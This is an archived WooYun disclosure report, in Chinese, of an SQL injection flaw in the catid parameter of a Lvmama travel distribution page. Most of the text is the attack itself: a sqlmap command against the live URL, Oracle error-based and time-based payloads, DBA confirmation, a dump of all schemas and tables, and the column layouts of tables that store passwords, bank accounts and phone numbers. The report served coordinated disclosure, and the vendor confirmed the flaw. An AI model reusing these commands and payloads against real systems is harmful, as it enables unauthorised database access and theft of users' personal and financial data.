乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
突然看到公开的漏洞,有很多驴妈妈旅游网了,也来测试看看,什么都不懂!~~~这个是要验证登录的么?或许不要登录就可以看到吧,既然如此,就测试测试!~~~
会有礼物送的么?注入点:http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700catid存在注入,我们添加英文符号撇,会返回错误,疑似存在注入在没有增加--level 3之前测试,catid存在注入,但是测试不出来,添加--level 3后,顺利出来了!~~~
sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700" --threads 10 --dbms "Oracle" --level 3 --current-user --current-db --is-dba
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: catid Type: error-based Title: Oracle error-based - Parameter replace Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(109)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (1434=1434) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(98)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)&orderby=3&minprice=100&maxprice=700 Type: AND/OR time-based blind Title: Oracle time-based blind - Parameter replace Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT (CASE WHEN (7573=7573) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(100)||CHR(97)||CHR(120),5) ELSE 7573 END) FROM DUAL)&orderby=3&minprice=100&maxprice=700---[01:35:19] [INFO] the back-end DBMS is Oracleweb application technology: Apache, JSPback-end DBMS: Oracle[01:35:19] [INFO] fetching current user[01:35:19] [INFO] retrieved: SAAS14current user: 'SAAS14'[01:35:19] [INFO] fetching current database[01:35:19] [INFO] resumed: SAAS14[01:35:19] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'SAAS14'[01:35:19] [INFO] testing if current user is DBAcurrent user is DBA: True[01:50:25] [INFO] the SQL query used returns 20 entries[01:50:25] [INFO] starting 10 threads[01:50:25] [INFO] resumed: CTXSYS[01:50:25] [INFO] resumed: DBSNMP[01:50:25] [INFO] resumed: DMSYS[01:50:25] [INFO] resumed: EXFSYS[01:50:25] [INFO] resumed: MDSYS[01:50:25] [INFO] resumed: OLAPSYS[01:50:25] [INFO] resumed: ORDSYS[01:50:25] [INFO] resumed: OUTLN[01:50:25] [INFO] resumed: SAAS15[01:50:25] [INFO] resumed: SAAS14[01:50:25] [INFO] resumed: SAAS17[01:50:25] [INFO] resumed: SAAS16[01:50:25] [INFO] resumed: SAAS19[01:50:25] [INFO] resumed: SAAS18[01:50:25] [INFO] resumed: SYS[01:50:25] [INFO] resumed: SYSMAN[01:50:25] [INFO] resumed: SYSTEM[01:50:25] [INFO] resumed: TSMSYS[01:50:25] [INFO] resumed: WMSYS[01:50:25] [INFO] resumed: XDBavailable databases [20]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SAAS14[*] SAAS15[*] SAAS16[*] SAAS17[*] SAAS18[*] SAAS19[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDBDatabase: SAAS14[502 tables]+--------------------------------+| AD_CONTENT || AD_PAGE || AD_SEAT || AD_SEAT_IMG || AD_SEAT_LINK || ALITRIP_HOTEL || ALITRIP_HOTEL_LOG || ALITRIP_HOTEL_ORDER || ALITRIP_HOTEL_ORDER_LOG || ALITRIP_HOTEL_PRODUCT || ALITRIP_HOTEL_PROD_LOG || ALITRIP_HOTEL_PROD_SYNC_LOG || ALITRIP_MENPIAO_LOG || ALITRIP_MENPIAO_NEWLOG || ALITRIP_MENPIAO_ORDER || ALITRIP_MENPIAO_PRODUCT || ALITRIP_MENPIAO_RECEIVE || ALITRIP_ROOMTYPE || B2B_CHANNEL_PRICE || B2B_CHANNEL_PRICE_DAY || B2B_DEALER || B2B_DEALER_DAY || B2B_DEALER_LOG || B2B_FREETRAVEL || B2B_GRADE_PRICE || B2B_ORDER_REPORT || B2B_PACKAGE || B2B_SQPRICE || B2B_SQPRICE_DETAIL || B2B_TICKET || B2B_TICKET_2012 || B2B_TICKET_2013 || B2B_TICKET_AIRPORT || B2B_TICKET_BD || B2B_TICKET_CHANGE || B2B_TICKET_CHANGE_DETAIL || B2B_TICKET_CODE || B2B_TICKET_COND || B2B_TICKET_CONFIRM_LOG || B2B_TICKET_DETAIL || B2B_TICKET_DETAIL_2012 || B2B_TICKET_DETAIL_2013 || B2B_TICKET_EX || B2B_TICKET_FINISH_LOG || B2B_TICKET_HIS || B2B_TICKET_LOG || B2B_TICKET_PEOPLE || B2B_TICKET_STARTINFO || B2B_TICKET_TRAFFIC || B2C_CHANNEL_PRICE || B2C_TAOBAO_CONFIG || B2C_TAOBAO_LOG || B2C_TAOBAO_NOTIFYRECEIVEMSG || B2C_TAOBAO_ORDER || B2C_TAOBAO_ORDER_LOG || B2C_TAOBAO_PRODUCT || BANK_CITYCODE || BILL_TO_UFSOFT || CM_CHANNEL_PRICE || CM_ORDER_LOG || CM_PAY_BALANCE || CM_PAY_DRAWMONEY || CM_PAY_DRAWMONEY_LOG || CM_PAY_MONEY_LOG || CM_PAY_ORDER_LOG || CM_PROD_LOG || CM_SYNC_LOG || CM_SYNC_PROD_LOG || CM_USER || CM_USER_INFO || CRUEL_CODE_CUST || CRUEL_CODE_LIST || CRUEL_CODE_LOG || CRUEL_CODE_MESSAGE || CRUEL_CODE_POS || CRUEL_CODE_VERIFY || CRUEL_EXP_CODE || CRUEL_EXP_LIST || CTRIPTICKET_ORDER_LOG || CUSTVIEW_INFO || CUST_BALANCE_LOG || CUST_INFO_GROUP_CHANNEL || CUST_VIEW_INFO || DIY_MDD || DIY_MDD_TYPE || DIY_REL_MDD_PROD || EXPCODE_DETAIL || EXPCODE_LIST || GROUP_INFO || GROUP_INFO_2ND || GROUP_INFO_DETAIL_2ND || GROUP_INFO_ORDER || GROUP_ORDER || GROUP_ORDER_PEOPLE || GROUP_SET || GROUP_YY_ORDER || GROUP_YY_ORDER_COND || GROUP_YY_ORDER_DETAIL || GROUP_YY_ORDER_LOG || GROUP_YY_ORDER_PEOPLE || GRP_CHANNEL_PRICE || GRP_GRADE_PRICE || GRP_ORDER || GRP_ORDER_DETAIL || GRP_TICKET || GRP_TICKET_PRICE || HOTEL_PLAN || HOTEL_PLAN_PRICE || HOTEL_PLAN_TYPE || HOTEL_WEEKSHOW || IMP_CODE || IMP_CODE_DETAIL || IMP_CODE_LIST || INFO_AIRPORT || INFO_AIRPORT_FLIGHT || INFO_AIRPORT_NUM || INFO_AIRPORT_NUM_LIST || INFO_AIRPORT_PRICE || INFO_AIRPORT_SEAT || INFO_AUTO_PRICE || INFO_CAR || INFO_CAR_TYPE || INFO_CATALOG || INFO_COMMENT || INFO_CONDS || INFO_CTRIPTICKET || INFO_FREETRAVEL || INFO_FREETRAVEL_TREE || INFO_GROUP || INFO_GROUP_DETAIL || INFO_HOTEL || INFO_HOTEL_NUM || INFO_HOTEL_PRICE || INFO_HOTEL_SET || INFO_INSURANCE || INFO_INSURANCE_LOG || INFO_INSURANCE_ORDER || INFO_JD || INFO_MEITUAN || INFO_NEWS || INFO_NEWS_READLOG || INFO_PLAN_PRICE || INFO_PROD || INFO_QUNAR_CONFIG || INFO_QUNAR_HOTEL || INFO_QUNAR_VIEW || INFO_TB_PRICE || INFO_TICKET || INFO_TICKET_CANCEL || INFO_TICKET_COND || INFO_TICKET_CUST || INFO_TICKET_DETAIL || INFO_TICKET_EX || INFO_TICKET_MAILTEMP || INFO_TICKET_NUM || INFO_TICKET_NUM_FOREX || INFO_TICKET_PRICE || INFO_TICKET_PRICE_FOREX || INFO_TICKET_REL || INFO_TICKET_RELAREA || INFO_TICKET_RELCAT || INFO_TICKET_RELVIEW || INFO_TICKET_REL_CUST || INFO_TOGO || INFO_TRAFFIC || INFO_TRAFFIC_NUM || INFO_TRAFFIC_NUM_LIST || INFO_TRAFFIC_PLACE || INFO_TRAFFIC_PRICE || INFO_TRAFFIC_SEAT || INFO_TRAFFIC_STATION || INFO_TRAFFIC_TIMES || INFO_TRAVEL || INFO_TRAVEL_CYCLE || INFO_TRAVEL_CYCLE_AUTO || INFO_TRAVEL_JOURNEY || INFO_TRAVEL_PRICE || INFO_TRAVEL_SEAT || INFO_TUNIU || INFO_VENUE || INFO_VENUE_NUM || INFO_VISA || INTERFACE_AILVTONG_LOG || INTERFACE_AIZHAOPIAO_LOG || INTERFACE_BEIZHU_LOG || INTERFACE_CAIHUISHIJIE_LOG || INTERFACE_CHANGLU_LOG || INTERFACE_CHANGLV_LOG || INTERFACE_CHANGYOUTONG_LOG || INTERFACE_CTRIP_HOLIDAY || INTERFACE_DADONGRT_LOG || INTERFACE_DDRT_LOG || INTERFACE_DIANPING_LOG || INTERFACE_DMZH_LOG || INTERFACE_DUMUQIAO_LOG || INTERFACE_FURONGYUAN_LOG || INTERFACE_FZG_BIZZONE || INTERFACE_GLYD || INTERFACE_HKDISNEY_LOG || INTERFACE_HOTEL || INTERFACE_HOTEL_BE_PRODUCT || INTERFACE_HOTEL_DDS_LOG || INTERFACE_HOTEL_DDS_ORDER_LOG || INTERFACE_HOTEL_JL || INTERFACE_HOTEL_JL_LOG || INTERFACE_HOTEL_JL_ORDER_LOG || INTERFACE_HOTEL_LTJL_LOG || INTERFACE_HOTEL_LTJL_ORDER_LOG || INTERFACE_HOTEL_LTJL_PRODUCT || INTERFACE_HOTEL_LYY_ORDER_LOG || INTERFACE_HOTEL_PRODUCT || INTERFACE_HOTEL_XH_LOG || INTERFACE_HOTEL_XH_ORDER_LOG || INTERFACE_HOTEL_XH_PRODUCT || INTERFACE_HUANQIU_LOG || INTERFACE_HUANTAOYOU_LOG || INTERFACE_HUAXIAPIAOLIAN_LOG || INTERFACE_IHUIU_LOG || INTERFACE_IMAGECO || INTERFACE_IMAGECO_CUST || INTERFACE_JD_CHANNEL_LOG || INTERFACE_JD_COUPON_PWD || INTERFACE_JIDIAOTONG_LOG || INTERFACE_KUIYUAN_LOG || INTERFACE_KUXIU_LOG || INTERFACE_LEXIAOXIANG_LOG || INTERFACE_LINE || INTERFACE_LINGNAN_LOG || INTERFACE_LIULIUKA_LOG || INTERFACE_LLK_CODE || INTERFACE_LLK_CUST || INTERFACE_LOG || INTERFACE_LONG || INTERFACE_LVMAMA_LOG || INTERFACE_MAP || INTERFACE_MEITUAN_DETAIL || INTERFACE_MEITUAN_LOG || INTERFACE_MJLD_LOG || INTERFACE_MOUNTWG_LOG || INTERFACE_MTS || INTERFACE_MTS_LOG || INTERFACE_PIAOFUTONG_LOG || INTERFACE_PIAOGJ_LOG || INTERFACE_PIAOGONGCHANG_LOG || INTERFACE_PIAOWUBA_LOG || INTERFACE_PIAOZHIJIA_LOG || INTERFACE_PRICE_RULE || INTERFACE_PROD_SYNC_LOG || INTERFACE_QUNAR || INTERFACE_QUNAR_HISTORY_LOG || INTERFACE_QUNAR_HISTOY_LOG || INTERFACE_QUNAR_HOLIDAY || INTERFACE_QUNAR_HOLIDAY_LOG || INTERFACE_QUNAR_HOTEL || INTERFACE_QUNAR_HOTEL_LOG || INTERFACE_QUNAR_INVOICE || INTERFACE_QUNAR_LINE_LOG || INTERFACE_QUNAR_LOG || INTERFACE_QUNAR_MOVE || INTERFACE_QUNAR_SUPPLIER_LOG || INTERFACE_SHANHAIGUAN_LOG || INTERFACE_SHOUKEYI_LOG || INTERFACE_SXLY || INTERFACE_SYNC_LOG || INTERFACE_TIANGUI_LOG || INTERFACE_TIANKE_LOG || INTERFACE_TICKET || INTERFACE_TONGCHENG_LOG || INTERFACE_TOURMART_LOG || INTERFACE_TUNIU_LOG || INTERFACE_VISITBEIJING_LOG || INTERFACE_WEIXUN_LOG || INTERFACE_WULONG_LOG || INTERFACE_XIAONIREN_LOG || INTERFACE_XIECHENG_LOG || INTERFACE_XINAIMOKE_LOG || INTERFACE_YANGGUANGLZ_LOG || INTERFACE_YINLVTONG_LOG || INTERFACE_YUANFAN_LOG || INTERFACE_YYJQ_LOG || INTERFACE_ZHONGJINGXIN_LOG || JOURNEY || JOURNEY_COMMENT || JOURNEY_DETAIL || JOURNEY_PRO_DETAIL || LVMAMA_CHUANHUO_LOG || LVMAMA_PRODUCT_INFO || LVMAMA_PRODUCT_LIST || LVMAMA_PUSH_LOG || LVMAMA_UPDATE_FLAG || LVMAMA_VIEW || LVMAMA_VIEW_INFO || LVWUTONGCODE_QUEUE || LVWUTONG_SMSMODE || LVWUTONG_TMPCODE || LVWUTONG_TMPCODE_GROUP || LVWUTONG_TMPCODE_LOG || LVWUTONG_TMPCODE_USE || NANHU_DEPTSET || ONLINE_DEBUG_LOG || ORDER_ABNORMAL_LOG || ORDER_API_PAY || ORDER_CHANGE_LOG || ORDER_LOG || ORDER_RELATION_LOG || PAY_BALANCE || PAY_CREDIT_FEE || PAY_DRAWMONEY || PAY_MOMEY_LOG || PAY_ORDER_LOG || PLAN_TABLE || QUNAR_PRICE_CACHE || RECE_APP || RECE_APP_DETAIL || RECE_INVOICE || RECE_INVOICE_DETAIL || RECE_PAYMENT_DETAIL || RECE_PAYMENT_LIST || RECE_STATEMENT_LIST || RUPD$_B2B_SETTLE_METHOD || RUPD$_B2B_TICKET || RUPD$_B2B_TICKET_DETAIL || RUPD$_HOTEL_BRAND || RUPD$_HOTEL_DISTRICT || RUPD$_HOTEL_INFO || RUPD$_INFO_AREA || RUPD$_INFO_AREA_EX || RUPD$_INFO_BANK || RUPD$_INFO_CAR || RUPD$_INFO_CONDS || RUPD$_INFO_HOTEL || RUPD$_INFO_NEWS || RUPD$_INFO_PROD || RUPD$_INFO_TICKET || RUPD$_INFO_TICKET_CANCEL || RUPD$_INFO_TICKET_COND || RUPD$_INFO_TICKET_DETAIL || RUPD$_INFO_TICKET_EX || RUPD$_INFO_TICKET_PRICE || RUPD$_INFO_TICKET_RELAREA || RUPD$_INFO_TICKET_RELVIEW || RUPD$_INFO_TRAVEL || RUPD$_INFO_VISA || RUPD$_INFO_VISA_SORT || RUPD$_INTERFACE_LLK_CUST || RUPD$_SAAS_PERMISSION || RUPD$_SAAS_USER_INFO || RUPD$_TB_USR_INFO || RUPD$_TB_VIEW_INFO || RUPD$_USR_TAG || RUPD$_USR_VIEW || SAAS_AREA_SUB || SAAS_BUY_LOG || SAAS_CLUSTER || SAAS_DATAMAN || SAAS_INFO_AREA || SAAS_INFO_SUB || SAAS_NEWS || SAAS_NEWS_SORT || SAAS_NOTICE || SAAS_ORDER_SOURCE || SAAS_PAY_DRAWMONEY || SAAS_PAY_DRAWMONEY_LOG || SAAS_PAY_PRODUCT_TYPE || SAAS_PAY_SERVICE || SAAS_TABLE_SQL || SAAS_VAP_ORDER || SAAS_VAP_PRODUCT || SAAS_VIEW_SUB || SETTLE_ACCOUNT || SETTLE_PAYABLE || SETTLE_PAYABLE_DETAIL || SETTLE_PAYABLE_LIST || SETTLE_PAYAPP || SETTLE_PAYAPP_DETAIL || SETTLE_STATEMENT_DETAIL || SETTLE_STATEMENT_LIST || SITE_IP2 || SMS_CONSUME_LOG || SMS_GETMONEY_LOG || STOCK_ADD_LOG || STOCK_REPORT_DAY || SYS_CURRENCY_RATE || SYS_FEE_LOG || SYS_REFER || SYS_REPORT_DAY || SYS_SMS_LOG || SYS_SQL_HISTORY || SYS_SQL_QUEUE || TB_CONSUME_CODE || TB_RECEIVE_LOG || TEST_DB || TOUREASY_AREA || TOUREASY_LINE || TOUREASY_ORDER_INFO_PINGZHENG || TOUREASY_ORDER_QUEUE || TOUREASY_PRODUCT || TOUREASY_USR_LOG || TOUR_GUIDE || TRAFFIC_TO_TICKET || T_EQUIP || T_EQUIPSUB || T_LANDMARK || T_MATERIA || T_PRO_COMMON_NUM || T_PRO_COMMON_PRICE || T_PRO_DETAIL_COURSE || T_REGIONS || T_REGIONS_QD || T_REGIONS_SUBWAY || T_SPORTTYPE || T_VENUE || T_VENUE_COUNT || T_VENUE_PRICE || T_VENUE_RECORD || T_VENUE_SUB || UF_SOFT_QUEUE || UF_SOFT_SETTLE_PAYABLE || UF_SOFT_USR_CREDIT_LOG || UNIONPAY_CONFIG || UNIONPAY_TRADE_LOG || UPDATE_FOREXPRICE_LOG || USR_ACCOUNT || USR_ACCOUNT_LOG || USR_ACCOUNT_SET || USR_ATTENTION || USR_BALANCE_LOG || USR_BOOK || USR_CHECKIN_TYPE || USR_CREDIT || USR_CREDIT_LOG || USR_DEALER || USR_DEPT || USR_DIST || USR_DOCUMENT_TEMP || USR_ENTERPRISE_TAG || USR_GETPASS_LOG || USR_GRADE || USR_HOTEL_COND || USR_INFO || USR_INFO_B2C || USR_INFO_EXPRESS || USR_INTERFACE || USR_INTERFACE_INFO || USR_LOG || USR_LOGIN || USR_LOGIN_LOG || USR_LOG_2011 || USR_LOG_2012 || USR_LOG_2013 || USR_MAILTEMP_LIST || USR_MANAGER_USER || USR_MEMBER || USR_MENU || USR_MSG || USR_MSG_COMMENT || USR_MSG_MONEY || USR_PAGES || USR_POWER_AREA || USR_PRINT_TEMP || USR_PROD_CODE || USR_PROD_WHILE_AREA || USR_PROD_WHILE_DETAIL || USR_PROD_WHILE_GROUP || USR_PROD_WHILE_LIST || USR_PROD_WHILE_TREE || USR_SCORE || USR_SCORE_DETAIL || USR_SCORE_LOG || USR_SCORE_RULE || USR_VIEW_BAK || USR_VIEW_BOUNTY || USR_VIEW_COLUMN || USR_VIEW_COPY || USR_VIEW_LINK || USR_VIEW_MSG || USR_VIEW_MSG_HIS || USR_VIEW_NAV || USR_VIEW_PAGE || USR_VIEW_TEMPLATE || WX_AD || WX_AD_DETAIL || WX_AD_SEND_LOG || WX_COUPON_SCEEN || WX_COUPON_SEND_LOG || WX_KEY || WX_MSG || WX_MSG_TEMP || WX_ORDER_TASK || WX_SCENE || WX_SCENE_IN || WX_SCENE_LOG || WX_SEND_HISTORY || WX_SEND_QUEUE || WX_SET || WX_TREE || WX_USER_INFO || XIECHENG_HOTEL_INFO || XIECHENG_HOTEL_LOG || XIECHENG_HOTEL_ORDER || XIECHENG_HOTEL_STATE || INTERFACE_KUIYUAN_LOG |+--------------------------------+Database: SAAS14+-------------------------+---------+| Table | Entries |+-------------------------+---------+| LVMAMA_PUSH_LOG | 2502247 || LVMAMA_VIEW | 69067 || USR_LOG | 56983 || CM_ORDER_LOG | 49229 || B2B_TICKET_PEOPLE | 32502 || PAY_ORDER_LOG | 29363 || B2B_TICKET | 27955 || B2B_TICKET_DETAIL | 27955 || B2B_TICKET_EX | 27926 || CM_SYNC_LOG | 27562 || INTERFACE_LVMAMA_LOG | 25698 || LVMAMA_PRODUCT_LIST | 23209 || INFO_TICKET | 23208 || ORDER_LOG | 22026 || INFO_TICKET_RELVIEW | 16473 || LVMAMA_CHUANHUO_LOG | 14566 || USR_LOGIN_LOG | 11318 || PAY_BALANCE | 3750 || PAY_MOMEY_LOG | 2669 || B2B_TICKET_CHANGE | 1306 || CM_SYNC_PROD_LOG | 856 || B2B_CHANNEL_PRICE | 626 || LVMAMA_VIEW_INFO | 610 || INFO_TICKET_NUM | 559 || USR_LOGIN | 431 || INFO_TICKET_CUST | 415 || B2B_CHANNEL_PRICE_DAY | 382 || USR_INFO | 377 || USR_CREDIT_LOG | 369 || WX_SCENE_LOG | 308 || USR_GETPASS_LOG | 208 || INFO_TICKET_EX | 136 || LVMAMA_PRODUCT_INFO | 72 || USR_ATTENTION | 65 || ORDER_ABNORMAL_LOG | 50 || WX_USER_INFO | 45 || USR_INFO_B2C | 44 || USR_INTERFACE_INFO | 41 || WX_AD_DETAIL | 23 || USR_MEMBER | 18 || INFO_TICKET_PRICE | 6 || WX_AD | 5 || USR_CREDIT | 4 || WX_AD_SEND_LOG | 4 || WX_MSG_TEMP | 2 || CUST_INFO_GROUP_CHANNEL | 1 || INFO_CONDS | 1 || INFO_TICKET_CANCEL | 1 || INTERFACE_XIECHENG_LOG | 1 || LVMAMA_UPDATE_FLAG | 1 || SAAS_DATAMAN | 1 || USR_DOCUMENT_TEMP | 1 || USR_INFO_EXPRESS | 1 |+-------------------------+---------+Database: SAAS14Table: USR_LOG[7 columns]+----------------+----------+| Column | Type |+----------------+----------+| CUST_ID | NUMBER || LOG_DATE | DATE || LOG_DESC | VARCHAR2 || LOG_NUM | VARCHAR2 || LOG_TYPE | NUMBER || PARENT_CUST_ID | NUMBER || USER_ID | VARCHAR2 |+----------------+----------+Database: SAAS14Table: USR_LOGIN_LOG[7 columns]+----------------+----------+| Column | Type |+----------------+----------+| COOKIEID | VARCHAR2 || CUST_ID | NUMBER || IP | VARCHAR2 || LOGIN_DATE | DATE || LOGIN_TYPE | NUMBER || PARENT_CUST_ID | NUMBER || USER_ID | VARCHAR2 |+----------------+----------+Database: SAAS14Table: USR_INFO_EXPRESS[9 columns]+----------------+----------+| Column | Type |+----------------+----------+| ACCOUNT_NO | VARCHAR2 || CUST_ID | NUMBER || FROM_ADDRESS | VARCHAR2 || FROM_COM | VARCHAR2 || FROM_MAN | VARCHAR2 || FROM_TEL | VARCHAR2 || PARENT_CUST_ID | NUMBER || SHIP_INFO | VARCHAR2 || UPDATE_DATE | DATE |+----------------+----------+Database: SAAS14Table: USR_CREDIT[8 columns]+----------------+--------+| Column | Type |+----------------+--------+| ALL_CREDIT_NUM | NUMBER || CREATE_DATE | DATE || CREDIT_CUST_ID | NUMBER || CREDIT_NUM | NUMBER || CREDIT_TYPE | NUMBER || CUST_ID | NUMBER || ID | NUMBER || USE_CREDIT_NUM | NUMBER |+----------------+--------+Database: SAAS14Table: USR_INFO[95 columns]+---------------------+----------+| Column | Type |+---------------------+----------+| KEY | VARCHAR2 || ACCOUNT | VARCHAR2 || ACCOUNT_NAME | VARCHAR2 || AGREEMENT_DATE | DATE || AGREEMENT_IP | VARCHAR2 || AGREEMENT_USER | VARCHAR2 || ANDROID_UID | VARCHAR2 || AREA_ID | NUMBER || ATTENT_COUNT | NUMBER || BANK_ACCOUNT_NAME | VARCHAR2 || BANK_ACCOUNT_NO | VARCHAR2 || BANK_CITY | VARCHAR2 || BANK_CITYCODE | VARCHAR2 || BANK_NAME | VARCHAR2 || BANK_PROVINCE | VARCHAR2 || BANK_TYPE | VARCHAR2 || BEIANHAO | VARCHAR2 || CHECK_PRINT_NUM | NUMBER || CHECK_PRINT_PRICE | VARCHAR2 || CONTRACT_END_DATE | DATE || CONTRACT_PERSON | VARCHAR2 || CONTRACT_START_DATE | DATE || CURRENCY_TYPE | NUMBER || CUST_CODE | VARCHAR2 || CUST_DESC | CLOB || CUST_GAT_FEE | NUMBER || CUST_GAT_LIMIT | NUMBER || CUST_GRADE | NUMBER || CUST_ID | NUMBER || CUST_NAME | VARCHAR2 || CUST_PAY_FEE | NUMBER || CUST_TYPE | NUMBER || CUST_WEBSITE | VARCHAR2 || DEPOSIT | NUMBER || DYCON | VARCHAR2 || DYSHOW | NUMBER || FEE | NUMBER || GET_MONEY_MODE | NUMBER || INTERFACE_PAY_TYPE | NUMBER || IS_B2B | NUMBER || IS_CHECK | NUMBER || IS_CHECK_VALUES | VARCHAR2 || IS_CONFIRM_ORDER | NUMBER || IS_DISCOUNT | NUMBER || IS_GAT_MONEY | NUMBER || IS_GROUP | NUMBER || IS_POST | NUMBER || IS_PRODMANAGER | NUMBER || IS_SAAS | NUMBER || IS_SENDSMS | NUMBER || IS_WHILE | NUMBER || LAST_IP | VARCHAR2 || LINK_ADDRESS | VARCHAR2 || LINK_EMAIL | VARCHAR2 || LINK_FAX | VARCHAR2 || LINK_MOBILE | VARCHAR2 || LINK_NAME | VARCHAR2 || LINK_PHONE | VARCHAR2 || LINK_QQ | VARCHAR2 || LINK_SOURCE | VARCHAR2 || LOGIN_COUNT | NUMBER || LOGO | VARCHAR2 || MANAGER_MEMO | CLOB || ORDER_COUNT | NUMBER || ORDER_CUST_POWER | NUMBER || ORDER_MONEY | NUMBER || ORDER_POWER_FIELD | VARCHAR2 || ORDER_TICKET | NUMBER || PARENT_AGENT_ID | NUMBER || PARENT_CUST_ID | NUMBER || PAY_MODE | NUMBER || PRICESTATE_PUSHMAIL | VARCHAR2 || PROD_COUNT | NUMBER || REG_DATE | DATE || REG_IP | VARCHAR2 || REMARK | VARCHAR2 || REPORT_POWER | VARCHAR2 || RETURN_MODE | NUMBER || SALE_CHANNEL | VARCHAR2 || SALE_COUNT | NUMBER || SALE_MONEY | NUMBER || SALE_TICKET | NUMBER || SALE_TYPE | NUMBER || SEAL_PATH | VARCHAR2 || SENDMSG_MOBILE | VARCHAR2 || SENDMSG_SMS | VARCHAR2 || SERVICE_FEE_PAY | NUMBER || SOURCE_URL | VARCHAR2 || STATE | NUMBER || STOP_DATE | DATE || STOP_IP | VARCHAR2 || STOP_USER | VARCHAR2 || USER_ID | VARCHAR2 || VIP | NUMBER || WHILE_RELCODE | VARCHAR2 |+---------------------+----------+Database: SAAS14Table: PAY_MOMEY_LOG[17 columns]+----------------------+----------+| Column | Type |+----------------------+----------+| CUR_BALANCE | NUMBER || CUST_ID | NUMBER || ID | NUMBER || PARENT_CUST_ID | NUMBER || PAY_ACCOUNT | VARCHAR2 || PAY_BALANCE_ID | NUMBER || PAY_DATE | DATE || PAY_LOG | CLOB || PAY_NUM | NUMBER || PAY_SERVICE | VARCHAR2 || PAY_SERVICE_ORDER_ID | VARCHAR2 || PAY_TYPE | NUMBER || REC_BALANCE | NUMBER || STATE | NUMBER || USER_ID | VARCHAR2 || USER_REMARK | CLOB || WORKFLOWNO | VARCHAR2 |+----------------------+----------+Database: SAAS14Table: USR_MEMBER[26 columns]+-------------------+----------+| Column | Type |+-------------------+----------+| ACCOUNT | VARCHAR2 || ACCOUNT_NAME | VARCHAR2 || BANK_ACCOUNT_NAME | VARCHAR2 || BANK_ACCOUNT_NO | VARCHAR2 || BANK_CITY | VARCHAR2 || BANK_NAME | VARCHAR2 || BANK_PROVINCE | VARCHAR2 || BANK_TYPE | VARCHAR2 || BOOK_COUNT | NUMBER || DEPOSIT | NUMBER || EMAIL | VARCHAR2 || IMG | VARCHAR2 || LAST_LOGIN | DATE || LOGIN_COUNT | NUMBER || LOGIN_TYPE | NUMBER || MOBILE | VARCHAR2 || ORDER_COUNT | NUMBER || ORDER_CUST_ID | NUMBER || OUT_USER_ID | VARCHAR2 || PARENT_CUST_ID | NUMBER || PASSWORD | VARCHAR2 || REG_DATE | DATE || STATUS | NUMBER || USER_ID | NUMBER || USER_NAME | VARCHAR2 || VCODE | VARCHAR2 |+-------------------+----------+Database: SAAS14Table: WX_USER_INFO[21 columns]+------------------+----------+| Column | Type |+------------------+----------+| AREA_ID | NUMBER || CITY | VARCHAR2 || COUNTRY | VARCHAR2 || CREATE_DATE | DATE || CUST_ID | NUMBER || HEADIMGURL | VARCHAR2 || LOGIN_DATE | DATE || NICKNAME | VARCHAR2 || OPENID | VARCHAR2 || ORDER_CUST_ID | NUMBER || PARENT_CUST_ID | NUMBER || PROVINCE | VARCHAR2 || SEX | NUMBER || SOURCE_ID | NUMBER || STATE | NUMBER || SUBSCRIBE_TIME | DATE || TREE_ID | NUMBER || UNSUBSCRIBE_TIME | DATE || USER_ID | VARCHAR2 || USER_LANGUAGE | VARCHAR2 || USER_MEMO | VARCHAR2 |+------------------+----------+Database: SAAS14Table: USR_LOGIN[32 columns]+------------------+----------+| Column | Type |+------------------+----------+| CUST_ID | NUMBER || CZ_STARTTIME | DATE || CZCODE | VARCHAR2 || DEPT_ID | NUMBER || DUTY_STATE | NUMBER || DYCON | VARCHAR2 || DYSHOW | NUMBER || EMAIL | VARCHAR2 || FAX | VARCHAR2 || IS_CZ | NUMBER || IS_DISPRICE | NUMBER || IS_MANAGER | NUMBER || IS_ORDERLIST | NUMBER || IS_PAY | NUMBER || IS_SHOWSYSTEMMSG | NUMBER || IS_VALIDATE | NUMBER || LAST_DATE | DATE || LAST_IP | VARCHAR2 || LOGIN_COUNT | NUMBER || LYT_ID | VARCHAR2 || MOBILE | VARCHAR2 || PARENT_AGENT_ID | NUMBER || PASSWORD | VARCHAR2 || PHONE | VARCHAR2 || PWD | VARCHAR2 || ROLE_ID | NUMBER || ROLE_TYPE | NUMBER || USER_GRADE | NUMBER || USER_ID | VARCHAR2 || USER_NAME | VARCHAR2 || USER_PERMISSION | VARCHAR2 || USER_STATE | NUMBER |+------------------+----------+
如上
过滤修复
危害等级:高
漏洞Rank:20
确认时间:2015-11-09 17:56
thx
暂无